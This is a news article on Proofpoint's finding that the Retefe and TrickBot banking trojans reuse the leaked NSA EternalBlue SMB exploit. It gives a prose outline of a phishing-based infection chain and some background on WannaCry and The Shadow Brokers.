WannaCry Some More? Cybercriminals Using NSA Hacking Tools to Attack Citizens

NSA-linked hacking tools are being used by cybercriminals in efforts to remotely steal money and confidential information from online banking users, according to research conducted by cybersecurity firm Proofpoint.

Proofpoint researchers discovered two different banking trojans in the wild, with computer code taken from a now-publicly available exploit known as "EternalBlue" (CVE-2017-0144).

EternalBlue is used by the NSA to gather intelligence, and targets a vulnerability in Microsoft's Server Message Block protocol, which affects outdated versions of several different Microsoft operating systems. It allows hackers to quickly compromise multiple computers on a shared network, as long as they are all similarly running dated software.

Patching Windows can take a very long for organizations if they are suitably large — often, exploits that are several years old can still be successfully used in attacks. Evidently, as long as threat actors continue to find widespread, unpatched vulnerabilities, they will continue to leverage exploits such as EternalBlue.

Trojan Duo

The two Trojans — Retefe and TrickBot — are relatively common, and have been in use for several months as part of various email phishing campaigns targeted at companies and individual users. The latest versions of these trojans carry elements of EternalBlue.

The new variant of Retefe identified by Proofpoint was sent in an unsolicited email to a company, containing a malicious Microsoft Office document laden with embedded Package Shell Objects. When opened, a PowerShell command launches a download for a.zip archive holding an obfuscated JavaScript installer, hosted on a remote server. The end result is the installation of a virus that leverages EternalBlue to quickly spread inside an infected network.

Retefe has been largely used in attacks against banks in Austria, Sweden, Switzerland, Japan and the United Kingdom, according to researchers. While it has never reached the scale or notoriety of better-known banking Trojans such as Dridex or Zeus, Retefe is notable for its consistent regional focus, and interesting implementation, Proofpoint note.

Nonetheless, the use of EternalBlue doesn't appear to be focused or aimed at one specific industry or region, and there is no common theme in terms of targeting for attacks leveraging EternalBlue. Attackers appear to be pursuing both disruptive and destructive ends, as with WannaCry — which was also propagated via EternalBlue.

In the past, EternalBlue exploits have been used tandem with ransomware to extort money from businesses. It's not entirely clear who is behind Retefe or Trickbot, although a relatively small group is thought to be behind the spread of Retefe.

The EternalBlue exploit first became publicly known — and adoptable — following the publication of a package of NSA documents by a group known as The Shadow Brokers.